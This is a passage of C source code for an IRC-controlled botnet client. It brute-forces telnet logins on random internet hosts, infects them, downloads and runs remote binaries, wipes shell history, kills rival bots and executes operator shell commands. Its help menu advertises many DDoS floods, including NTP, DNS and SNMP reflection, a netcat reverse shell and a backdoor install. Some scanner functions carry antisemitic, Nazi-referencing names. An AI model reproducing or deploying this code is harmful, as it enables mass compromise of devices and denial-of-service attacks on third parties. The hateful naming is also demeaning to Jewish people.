timeout)3021{3022struct sockaddr_in dest_addr;3023fd_set myset;3024struct timeval tv;3025socklen_t lon;30263027int valopt;3028long arg = fcntl(fd, F_GETFL, NULL);3029arg |= O_NONBLOCK;3030fcntl(fd, F_SETFL, arg);30313032dest_addr.sin_family = AF_INET;3033dest_addr.sin_port = htons(port);3034if(getHost(host, &dest_addr.sin_addr)) return 0;3035memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);3036int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));30373038if(res < 0) {3039if(errno == EINPROGRESS) {3040tv.tv_sec = timeout;3041tv.tv_usec = 0;3042FD_ZERO(&myset);3043FD_SET(fd, &myset);3044if(select(fd+1, NULL, &myset, NULL, &tv) > 0) {3045lon = sizeof(int);3046getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);3047if(valopt) return 0;3048}3049else return 0;3050}3051else return 0;3052}30533054arg = fcntl(fd, F_GETFL, NULL);3055arg &= (~O_NONBLOCK);3056fcntl(fd, F_SETFL, arg);30573058return 1;3059}30603061int negotiate(int sock, unsigned char *buf, int len)3062{3063unsigned char c;30643065switch (buf[1]) {3066case CMD_IAC: /*dropped an extra 0xFF wh00ps*/3067return 0;3068case CMD_WILL:3069case CMD_WONT:3070case CMD_DO:3071case CMD_DONT:3072c = CMD_IAC;3073send(sock, &c, 1, MSG_NOSIGNAL);3074if(CMD_WONT == buf[1]) c = CMD_DONT;3075else if(CMD_DONT == buf[1]) c = CMD_WONT;3076else if(OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);3077else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);3078send(sock, &c, 1, MSG_NOSIGNAL);3079send(sock, &(buf[2]), 1, MSG_NOSIGNAL);3080break;30813082default:3083break;3084}30853086return 0;3087}30883089int matchPrompt(char *bufStr)3090{3091char *prompts = ":>%$#\0";30923093int bufLen = strlen(bufStr);3094int i, q = 0;3095for(i = 0; i < strlen(prompts); i++)3096{3097while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;3098if(*(bufStr + bufLen - q) == prompts[i]) return 1;3099}31003101return 0;3102}31033104int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)3105{3106int bufferUsed = initialIndex, got = 0, found = 0;3107fd_set myset;3108struct timeval tv;3109tv.tv_sec = timeout;3110tv.tv_usec = timeoutusec;3111unsigned char *initialRead = NULL;31123113while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))3114{3115FD_ZERO(&myset);3116FD_SET(fd, &myset);3117if(select(fd+1, &myset, NULL, NULL, &tv) < 1) break;3118initialRead = buffer + bufferUsed;3119got = recv(fd, initialRead, 1, 0);3120if(got == -1 || got == 0) return 0;3121bufferUsed += got;3122if(*initialRead == 0xFF)3123{3124got = recv(fd, initialRead + 1, 2, 0);3125if(got == -1 || got == 0) return 0;3126bufferUsed += got;3127if(!negotiate(fd, initialRead, 3)) return 0;3128} else {3129if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) {3130found = 1;3131break;3132}3133}3134}31353136if(found) return 1;3137return 0;3138}3139314031413142static uint8_t ipState[5] = {0};31433144int sclose(int fd)3145{3146if(3 > fd) return 1;3147close(fd);3148return 0;3149}31503151void BurnTheJews(int wait_usec, int maxfds, int sock) {// Freaky scanner by Freak. pulls tonneesss3152if(!fork()) return;3153srand((time(NULL) ^ getpid()) + getppid());3154init_rand(time(NULL) ^ getpid());3155int shell;3156int max = getdtablesize() - 100, i, res, num_tmps, j;3157char buf[128], cur_dir;31583159if (max > maxfds)3160max = maxfds;3161fd_set fdset;3162struct timeval tv;3163socklen_t lon;3164int valopt;31653166char line[256];3167char* buffer;3168struct sockaddr_in dest_addr;3169dest_addr.sin_family = AF_INET;3170dest_addr.sin_port = htons(23);3171memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);31723173buffer = malloc(SOCKBUF_SIZE + 1);3174memset(buffer, 0, SOCKBUF_SIZE + 1);31753176struct ipstate_t fds[max];317731783179memset(fds, 0, max * (sizeof(int) + 1));3180for(i = 0; i < max; i++)3181{3182memset(&(fds[i]), 0, sizeof(struct ipstate_t));3183fds[i].complete = 1;3184fds[i].sockbuf = buffer;3185}31863187while(1)3188{3189for(i = 0; i < max; i++)3190{3191if(fds[i].totalTimeout == 0)3192{3193fds[i].totalTimeout = time(NULL);3194}31953196switch(fds[i].state)3197{3198case 0:3199{3200if(fds[i].complete == 1)3201{3202// clear the current fd3203char *tmp = fds[i].sockbuf;3204memset(&(fds[i]), 0, sizeof(struct ipstate_t));3205fds[i].sockbuf = tmp;3206// get a new random ip3207fds[i].ip = getRandomPublicIP();3208}3209else if(fds[i].complete == 0)3210{321132123213if(fds[i].usernameInd >= NUMITEMS(usernames) -1)3214{3215fds[i].complete = 1;3216continue;3217}3218fds[i].usernameInd++;3219fds[i].passwordInd++;32203221/*3222if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *))3223{3224fds[i].passwordInd = 0;3225fds[i].usernameInd++;3226}3227if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *))3228{3229fds[i].complete = 1;3230continue;3231}3232*/3233}3234dest_addr.sin_family = AF_INET;3235dest_addr.sin_port = htons(23);3236memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);3237dest_addr.sin_addr.s_addr = fds[i].ip;32383239fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);32403241if(fds[i].fd == -1) continue;32423243fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);32443245if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)3246{3247reset_ipstate(&fds[i]);3248}3249else3250{3251advance_state(&fds[i], 1);3252}3253}3254break;32553256case 1:3257{3258FD_ZERO(&fdset);3259FD_SET(fds[i].fd, &fdset);3260tv.tv_sec = 0;3261tv.tv_usec = wait_usec;3262res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);32633264if(res == 1)3265{3266lon = sizeof(int);3267valopt = 0;3268getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);3269//printf("%d\n",valopt);3270if(valopt)3271{3272reset_ipstate(&fds[i]);3273}3274else3275{3276fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));3277advance_state(&fds[i], 2);3278}3279continue;3280}3281else if(res == -1)3282{3283reset_ipstate(&fds[i]);3284continue;3285}32863287if(fds[i].totalTimeout + 6 < time(NULL))3288{3289reset_ipstate(&fds[i]);3290}3291}3292break;32933294case 2:3295{3296//Send(sock, "PRIVMSG %s :[TELNET] DISCOVERED - %s\n", chan, get_ipstate_host(&fds[i]));3297if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))3298{3299if(contains_fail(fds[i].sockbuf))3300{3301advance_state(&fds[i], 0);3302}3303else3304{3305advance_state(&fds[i], 3);3306}33073308continue;3309}33103311if(fds[i].totalTimeout + 6 < time(NULL))3312{3313reset_ipstate(&fds[i]);3314}3315}3316break;33173318case 3:3319{3320if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)3321{3322reset_ipstate(&fds[i]);3323continue;3324}33253326if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)3327{3328reset_ipstate(&fds[i]);3329continue;3330}33313332advance_state(&fds[i], 4);3333}3334break;33353336case 4:3337{3338if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))3339{3340if(contains_fail(fds[i].sockbuf))3341{3342advance_state(&fds[i], 0);3343}3344else3345{3346advance_state(&fds[i], 5);3347}3348continue;3349}33503351if(fds[i].totalTimeout + 6 < time(NULL))3352{3353reset_ipstate(&fds[i]);3354}3355}3356break;33573358case 5:3359{3360//Send(sock, "PRIVMSG %s :[TELNET] ATTEMPT - %s:23 %s:%s\n", chan, get_ipstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);3361if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)3362{3363reset_ipstate(&fds[i]);3364continue;3365}33663367if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)3368{3369reset_ipstate(&fds[i]);3370continue;3371}33723373advance_state(&fds[i], 6);3374}3375break;33763377case 6:3378{3379if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))3380{3381fds[i].totalTimeout = 0;33823383if(contains_fail(fds[i].sockbuf))3384{3385advance_state(&fds[i], 0);3386}3387else if(contains_success(fds[i].sockbuf))3388{3389if(fds[i].complete == 2)3390{3391advance_state(&fds[i], 7);3392}3393else3394{3395Send(sock, "PRIVMSG %s :[TELNET] CRACKED - %s:23 %s:%s\n", chan, get_ipstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);3396advance_state(&fds[i], 7);3397}3398}3399else3400{3401reset_ipstate(&fds[i]);3402}3403continue;3404}34053406if(fds[i].totalTimeout + 7 < time(NULL))3407{3408reset_ipstate(&fds[i]);3409}3410}3411break;3412case 7:3413{3414fds[i].totalTimeout = 0;3415//get shell just in case we dont have it already3416for(shell = 0; shell < NUMITEMS(shellz); shell++) {3417memset(buf, 0, 128);3418snprintf(buf, 2 + strlen(shellz[shell]), "%s\r\n", shellz[shell]);3419if(send(fds[i].fd, buf, strlen(shellz[shell]), MSG_NOSIGNAL) < 0) {3420reset_ipstate(&fds[i]);3421continue;3422}3423}34243425for(j = 0; j < num_tmps; j++)3426{3427memset(buf, 0, 128);3428if(j == 0)3429snprintf(buf, 58 + (strlen(tmpdirs[j]) * 4), ">%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j], tmpdirs[j]);3430else3431snprintf(buf, 24 + strlen(tmpdirs[j]), ">%s.t && cd %s ; >retrieve\r\n", tmpdirs[j], tmpdirs[j], tmpdirs[j]);34323433if(send(fds[i].fd, buf, strlen(buf), MSG_NOSIGNAL) < 0)3434{3435reset_ipstate(&fds[i]);3436continue;3437}3438}3439advance_state(&fds[i], 8);3440}3441break;3442case 8:3443{3444fds[i].totalTimeout = 0;34453446if(send(fds[i].fd, rekdevice, strlen(rekdevice), MSG_NOSIGNAL) < 0)3447{3448Send(sock, "PRIVMSG %s :[TELNET] INFECTED - %s:23 %s:%s\n", chan, get_ipstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);3449reset_ipstate(&fds[i]);3450continue;3451}3452if(fds[i].totalTimeout + 10 < time(NULL))3453{3454Send(sock, "PRIVMSG %s :[TELNET] FAILED TO INFECT - %s:23 %s:%s\n", chan, get_ipstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);3455reset_ipstate(&fds[i]);3456}3457break;3458}3459}3460}3461}3462}3463346434653466void SeigHeil(int sock) {3467uint32_t parent;3468parent = fork();3469int forks = sysconf(_SC_NPROCESSORS_ONLN) * 1; //1 fork for each scanner for each cpu3470int fds = forks * 64; //Quite effective. 64 sockets for each CPU fork. - Freak3471int waitms = 370; //Timeout is 370 milliseconds3472if(parent > 0) {3473scanPid = parent;3474return;3475}3476else if(parent == -1) return;3477int ii;3478for(ii = 0; ii < forks; ii++) {3479BurnTheJews(waitms, fds, sock);3480}3481return;3482}34833484void doScanner(int sock, char *sender, int argc, char **argv) {3485if(argc < 1) {3486Send(sock, "NOTICE %s :SCANNER <ON/OFF>\n", sender);3487return;3488}3489if(!strcmp(argv[1], "ON") || !strcmp(argv[1], "on")) {3490if(scanPid == 0) {3491SeigHeil(sock);3492if(scanPid != 0) {3493Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER STARTED!\n", chan); //Scanner has been started successfully!!!3494return;3495} else {3496Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED TO START SCANNER!\n", chan); //fuk ;-;3497return;3498}3499} else {3500Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER ALREADY STARTED!\n", chan);3501return;3502}3503}3504if(!strcmp(argv[1], "OFF") || !strcmp(argv[1], "off")) {3505if(scanPid != 0) {3506if(kill(scanPid, 9) == 0) {3507Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER KILLED!\n", chan);3508scanPid = 0;3509return;3510} else {3511Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED TO KILL SCANNER!\n", chan);3512return;3513}3514} else {3515Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER NOT STARTED!\n", chan);3516return;3517}3518} else {3519Send(sock, "NOTICE %s :SCANNER <ON/OFF>\n", sender);3520return;3521}3522}35233524void botkill() {3525int i;3526if(!fork()) return;3527while(1) {3528for (i = 0; i < NUMITEMS(knownBots); i++) {3529char command[512];3530sprintf(command, "pkill -9 %s || busybox pkill -9 %s || /usr/busybox pkill -9 %s || /bin/busybox pkill -9 %s || /var/run/busybox pkill -9 %s", knownBots[i], knownBots[i], knownBots[i], knownBots[i], knownBots[i]);3531system(command);3532sleep(1);3533}3534}3535}35363537void ClearHistory() {3538system ("history -c;history -w");3539system ("cd /root;rm -f .bash_history");3540system ("cd /var/tmp; rm -f *");3541}35423543void dns2ip(int sock, char *sender, int argc, char **argv) {3544if(mfork(sender) != 0) return;3545if(argc == 1) {3546char ip[16];3547strncpy(ip, inet_ntoa( *((struct in_addr*) gethostbyname(argv[1])->h_addr_list[0])), 16 );3548Send(sock, "NOTICE %s :%s resolves to %s\n", sender, argv[1], ip);3549} else {3550Send(sock, "NOTICE %s :DNS2IP <domain>\n", sender);3551}3552exit(0);3553}35543555void update(int sock, char *sender, int argc, char **argv) {3556int sock2,i,d;3557struct sockaddr_in server;3558unsigned long ipaddr;3559unsigned char dgcc;3560char buf[1024], *file;3561FILE *gcc;3562int parent=getpid();3563if(mfork(sender) != 0) return;3564if(argc < 2) {3565Send(sock, "NOTICE %s :UPDATEHTTP <host> <src:bin>\n", sender);3566exit(0);3567}3568if((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {3569Send(sock, "NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).\n", sender);3570exit(0);3571}3572server.sin_family = AF_INET;3573server.sin_port = htons(80);3574if((ipaddr = inet_addr(argv[1])) == -1) {3575struct hostent *hostm;3576if((hostm=gethostbyname(argv[1])) == NULL) {3577Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);3578exit(0);3579}3580memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);3581}3582else server.sin_addr.s_addr = ipaddr;3583memset(&(server.sin_zero), 0, 8);3584if(connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {3585Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);3586exit(0);3587}35883589gcc=popen("gcc --help","r");3590if(gcc != NULL) {3591memset(buf,0,1024);3592fgets(buf,1024,gcc);3593if(!strstr(buf,"Usage")) dgcc=0;3594else dgcc=1;3595pclose(gcc);3596} else dgcc=0;35973598for (i=0;i<strlen(argv[2]) && argv[2][i] != ':';i++);3599argv[2][i]=0;3600if(dgcc) file=argv[2];3601else file=argv[2]+i+1;36023603Send(sock2,"GET /%s HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",file,argv[1]);3604Send(sock, "NOTICE %s :Receiving update.\n", sender);3605system("mkdir /tmp");3606if(dgcc) {3607FILE *file=fopen("/tmp/.c","wb");3608char bufm[4096];3609while(1) {3610int i;3611if((i=recv(sock2,bufm,4096,0)) <= 0) break;3612if(i < 4096) bufm[i]=0;3613for (d=0;d<i;d++) if(!strncmp(bufm+d,"\r\n\r\n",4)) {3614for (d+=4;d<i;d++) fputc(bufm[d],file);3615goto done;3616}3617}3618done:3619while(1) {3620int i;3621if((i=recv(sock2,bufm,4096,0)) <= 0) break;3622if(i < 4096) bufm[i]=0;3623for (d=0;d<i;d++) fputc(bufm[d],file);3624}3625fclose(file);3626memset(buf,0,4096);3627sprintf(buf,"(gcc -o %s /tmp/.c; rm -f /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1",execfile,parent,execfile);3628}3629else {3630FILE *file=fopen("/tmp/.o","wb");3631unsigned char bufm[4096];3632while(1) {3633int i;3634if((i=recv(sock2,bufm,4096,0)) <= 0) break;3635if(i < 4096) bufm[i]=0;3636for (d=0;d<i;d++) if(!strncmp(bufm+d,"\r\n\r\n",4)) {3637for (d+=4;d<i;d++) fputc(bufm[d],file);3638goto done2;3639}3640}3641done2:3642while(1) {3643int i,d;3644if((i=recv(sock2,bufm,4096,0)) <= 0) break;3645if(i < 4096) bufm[i]=0;3646for (d=0;d<i;d++) fputc(bufm[d],file);3647}3648fclose(file);3649memset(buf,0,4096);3650//sprintf(buf,"(chmod 755 /tmp/.o;kill -9 %d; kill -9 %d;trap '' 1 2; /tmp/.o &) > /dev/null",actualparent,parent,execfile);3651//sprintf(buf,"chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall .o;sleep 5;trap \"\" 1;/tmp/.o '&");3652sprintf(buf,"export PATH=/usr/sbin:/bin:/usr/bin:/sbin:/var/bin;chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall kt*;/var/bin/killall .o;/var/bin/sleep 5;trap "" 1;/tmp/.o '&");3653}3654close(sock);3655close(sock2);3656system(buf);3657kill(9,0);3658exit(0);3659}366036613662void move(int sock, char *sender, int argc, char **argv) {3663if(argc < 1) {3664Send(sock, "NOTICE %s :MOVE <server>\n", sender);3665exit(1);3666}3667server=strdup(argv[1]);3668changeservers=1;3669close(sock);3670}36713672void hackpkg(int sock, char *sender, int argc, char **argv) {3673int sock2,i,d;3674struct sockaddr_in server;3675unsigned long ipaddr;3676char buf[1024];3677FILE *file;3678mkdir("/var/bin", 0775);3679unsigned char bufm[4096];3680if(mfork(sender) != 0) return;3681if(argc < 2) {3682Send(sock, "NOTICE %s :HACKPGK <url> <binary name>\n", sender);3683exit(0);3684}3685if((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {3686Send(sock, "NOTICE %s :Unable to create socket.\n", sender);3687exit(0);3688}3689if(!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);3690else strcpy(buf,argv[1]);3691for (i=0;i<strlen(buf) && buf[i] != '/';i++);3692buf[i]=0;3693server.sin_family = AF_INET;3694server.sin_port = htons(80);3695if((ipaddr = inet_addr(buf)) == -1) {3696struct hostent *hostm;3697if((hostm=gethostbyname(buf)) == NULL) {3698Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);3699exit(0);3700}3701memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);3702}3703else server.sin_addr.s_addr = ipaddr;3704memset(&(server.sin_zero), 0, 8);3705if(connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {3706Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);3707exit(0);3708}37093710Send(sock2,"GET /%s HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);3711Send(sock, "NOTICE %s :Receiving file.\n", sender);3712file=fopen(argv[2],"wb");3713while(1) {3714int i;3715if((i=recv(sock2,bufm,4096,0)) <= 0) break;3716if(i < 4096) bufm[i]=0;3717for (d=0;d<i;d++) if(!strncmp(bufm+d,"\r\n\r\n",4)) {3718for (d+=4;d<i;d++) fputc(bufm[d],file);3719goto done;3720}3721}3722done:3723Send(sock, "NOTICE %s :Installed %s to hack path.\n", sender,argv[2]);3724while(1) {3725int i,d;3726if((i=recv(sock2,bufm,4096,0)) <= 0) break;3727if(i < 4096) bufm[i]=0;3728for (d=0;d<i;d++) fputc(bufm[d],file);3729}3730fclose(file);3731close(sock2);3732char MoveIt[255];3733sprintf(MoveIt, "cat %s > /var/bin/%s",argv[2],argv[2]);3734system(MoveIt);3735char DeleteIt[255];3736sprintf(DeleteIt, "rm -f %s", argv[2]);3737system(DeleteIt);3738char String[255];3739sprintf(String, "chmod 775 /var/bin/%s",argv[2]);3740system(String);3741char String2[255];3742sprintf(String2, "ls -l /var/bin/%s",argv[2]);3743system(String2);3744exit(0);3745}37463747void help(int sock, char *sender, int argc, char **argv) {3748if(mfork(sender) != 0) return;3749Send(sock, "NOTICE %s :Non-root/non-spoof DDoS commands commands:\n", sender); sleep(3);3750Send(sock, "NOTICE %s : STD <ip> <port> <time> = A non spoof HIV STD flooder\n", sender); sleep(1);3751Send(sock, "NOTICE %s : HOLD <host> <port> <time> = A vanilla TCP connect flooder\n", sender); sleep(1);3752Send(sock, "NOTICE %s : JUNK <host> <port> <time> = A vanilla TCP flooder (modded)\n", sender); sleep(1);3753Send(sock, "NOTICE %s : UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = An advanced non spoof UDP flooder modified by Freak\n", sender); sleep(1);3754Send(sock, "NOTICE %s : HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder\n", sender); sleep(1);3755Send(sock, "NOTICE %s : WGETFLOOD <url> <secs> = An HTTP(S) flooder\n", sender); sleep(1);3756Send(sock, "NOTICE %s :Spoof/root commands:\n", sender); sleep(3);3757Send(sock, "NOTICE %s : UDP <target> <port> <secs> = A UDP flooder\n", sender); sleep(1);3758Send(sock, "NOTICE %s : PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n", sender); sleep(1);3759Send(sock, "NOTICE %s : TCP <target> <port> <time> <flags> <packetsize> <pollinterval> <threads> = An advanced TCP flooder with multithreading. Will kill almost any service.\n", sender); sleep(1);3760Send(sock, "NOTICE %s : PHATWONK <target> <flags/method> <secs> = A leet flooder coded by Freak, attacks 31 ports. Can set flags or attack method.\n", sender); sleep(1);3761Send(sock, "NOTICE %s : BLACKNURSE <target ip> <secs> = An ICMP packet flooder that will crash most firewalls and use loads of CPU.\n", sender); sleep(1);3762Send(sock, "NOTICE %s : SOCKSTRESS <ip>:<port> <interface> -s <time> [-p payload] [-d delay]\n", sender); sleep(1);3763Send(sock, "NOTICE %s : NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = A NTP DrDoS flooder. Very potent.\n", sender); sleep(1);3764Send(sock, "NOTICE %s : DNS <IP> <port> <reflection file url> <threads> <time> = A DNS DrDoS flooder. Almost unblockable.\n", sender); sleep(1);3765Send(sock, "NOTICE %s : SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time> = SNMP DrDoS flooder. Insane amp factor (600 - 1700x)\n", sender); sleep(1);3766Send(sock, "NOTICE %s :Other commands:\n", sender); sleep(3);3767Send(sock, "NOTICE %s : RNDNICK = Randomizes the knights nick\n", sender); sleep(1);3768Send(sock, "NOTICE %s : NICK <nick> = Changes the nick of the client\n", sender); sleep(1);3769Send(sock, "NOTICE %s : SERVER <server> = Changes servers\n", sender); sleep(1);3770Send(sock, "NOTICE %s : GETSPOOFS = Gets the current spoofing\n", sender); sleep(1);3771Send(sock, "NOTICE %s : SPOOFS <subnet> = Changes spoofing to a subnet\n", sender); sleep(1);3772Send(sock, "NOTICE %s : DISABLE = Disables all packeting from this client\n", sender); sleep(1);3773Send(sock, "NOTICE %s : ENABLE = Enables all packeting from this client\n", sender); sleep(1);3774Send(sock, "NOTICE %s : KILL = Kills the knight\n", sender); sleep(1);3775Send(sock, "NOTICE %s : DNS2IP <domain>\n", sender); sleep(1);3776Send(sock, "NOTICE %s : GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n", sender); sleep(1);3777Send(sock, "NOTICE %s : UPDATE <http address> <src:bin> = Update this bot\n", sender); sleep(1);3778Send(sock, "NOTICE %s : HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!\n", sender); sleep(1);3779Send(sock, "NOTICE %s : VERSION = Requests version of client\n", sender); sleep(1);3780Send(sock, "NOTICE %s : KILLALL = Kills all current packeting\n", sender); sleep(1);3781Send(sock, "NOTICE %s : HELP = Displays this\n", sender); sleep(1);3782Send(sock, "NOTICE %s : IRC <command> = Sends this command to the server\n", sender); sleep(1);3783Send(sock, "NOTICE %s : SH <command> = Executes a command\n", sender); sleep(1);3784Send(sock, "NOTICE %s : ISH <command> = SH, interactive, sends to channel\n", sender); sleep(1);3785Send(sock, "NOTICE %s : SHD <command> = Executes a psuedo-daemonized command\n", sender); sleep(1);3786Send(sock, "NOTICE %s : GETBB <tftp server> = Get a proper busybox\n", sender); sleep(1);3787Send(sock, "NOTICE %s : INSTALL <http server/file_name> = Download & install a binary to /var/bin \n", sender); sleep(1);3788Send(sock, "NOTICE %s : BASH <cmd> = Execute commands using bash. \n", sender); sleep(1);3789Send(sock, "NOTICE %s : BINUPDATE <http:server/package> = Update a binary in /var/bin via wget \n", sender); sleep(1);3790Send(sock, "NOTICE %s : SCAN <nmap options> = Call the nmap wrapper script and scan with your opts. \n", sender); sleep(1);3791Send(sock, "NOTICE %s : RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh\n", sender); sleep(1);3792Send(sock, "NOTICE %s : LOCKUP <http:server> = Kill telnet, d/l aes backdoor from <server>, run that instead.\n", sender); sleep(1);3793Send(sock, "NOTICE %s : GETSSH <http:server/dropbearmulti> = D/l, install, configure and start dropbear on port 30022.\n", sender); sleep(1);3794exit(0);3795}3796void killall(int sock, char *sender, int argc, char **argv) {3797unsigned long i;3798for (i=0;i<numpids;i++) {3799if(pids[i] != 0 && pids[i] != getpid()) {3800if(sender) Send(sock, "NOTICE %s :Killing pid %d.\n", sender,pids[i]);3801kill(pids[i],9);3802}3803}3804}38053806void killd(int sock, char *sender, int argc, char **argv) {3807char buf[1024]={0};3808if(disabled == 1) return;3809sprintf(buf,"kill -9 %d;kill -9 0",actualparent);3810system(buf);3811exit(0);3812}38133814char *append(char *string1, char *string2) {3815char * result = NULL;3816asprintf(&result, "%s%s", string1, string2);3817return result;3818}38193820int ismaster(char *sender, char *masters[], int nummasters) {3821int i;3822char *master;38233824for (i=0; i < nummasters; i++) {3825master = append(masters[i], "!");3826if(!strncmp(master, sender, strlen(master)))3827return 1;3828}3829return 0;3830}38313832void histClear(int sock, char *sender, int argc, char **argv) {3833ClearHistory();3834Send(sock, "NOTICE %s :History cleared!\n", sender);3835return;3836}38373838struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {3839{ "STD", sendSTD },3840{ "UNKNOWN", unknown },3841{ "HTTP", HTTP },3842{ "WGETFLOOD", wgetHTTP },3843{ "HOLD", hold },3844{ "JUNK", junk },3845{ "PAN", pan },3846{ "UDP", udp },3847{ "TCP", tcpflood },3848{ "PHATWONK", phatwonk },3849{ "NTP", ntp },3850{ "SNMP", snmp },3851{ "DNS", dns },3852{ "BLACKNURSE", blacknurse },3853{ "SCANNER", doScanner },3854{ "DNS2IP", dns2ip },3855{ "NICK", nickc },3856{ "RNDNICK", rndnick },3857{ "CLEARHISTORY", histClear },3858{ "SERVER", move },3859{ "GETSPOOFS", getspoofs },3860{ "SPOOFS", spoof },3861{ "HACKPKG", hackpkg },3862{ "DISABLE", disable },3863{ "ENABLE", enable },3864{ "UPDATE", update },3865{ "KILLMYEYEPEEUSINGHOIC", killd },3866{ "GET", get },3867{ "VERSION", version },3868{ "KILLALL", killall },3869{ "HELP", help },3870{ (char *)0, (void (*)(int,char *,int,char **))0 } };38713872void _PRIVMSG(int sock, char *sender, char *str) {3873if(!ismaster(sender, masters, nummasters)) {3874return;3875}3876int i;3877char *to, *message;3878for (i=0;i<strlen(str) && str[i] != ' ';i++);3879str[i]=0;3880to=str;3881message=str+i+2;3882for (i=0;i<strlen(sender) && sender[i] != '!';i++);3883sender[i]=0;3884if(*message == '!' && !strcasecmp(to,chan)) {3885char *params[12], name[1024]={0};3886int num_params=0, m;3887message++;3888for (i=0;i<strlen(message) && message[i] != ' ';i++);3889message[i]=0;3890if(strwildmatch(message,nick)) return;3891message+=i+1;3892if(!strncmp(message,"IRC ",4)) if(disabled) Send(sock, "NOTICE %s :Unable to comply.\n", sender); else Send(sock, "%s\n",message+4);3893if(!strncmp(message,"SH ",3)) {3894char buf[1024];3895FILE *command;3896if(mfork(sender) != 0) return;3897memset(buf,0,1024);3898sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);3899command=popen(buf,"r");3900while(!feof(command)) {3901memset(buf,0,1024);3902fgets(buf,1024,command);3903Send(sock, "NOTICE %s :%s\n", sender,buf);3904sleep(1);3905}3906pclose(command);3907exit(0);3908}390939103911// SHD (daemonize sh command)3912if(!strncmp(message,"SHD ",4)) {3913char buf[1024];3914FILE *command;3915if(mfork(sender) != 0) return;3916memset(buf,0,1024);3917sprintf(buf,"export 